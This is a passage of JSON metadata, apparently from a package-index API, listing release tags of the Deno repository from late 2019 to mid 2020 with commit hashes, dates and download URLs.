2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/de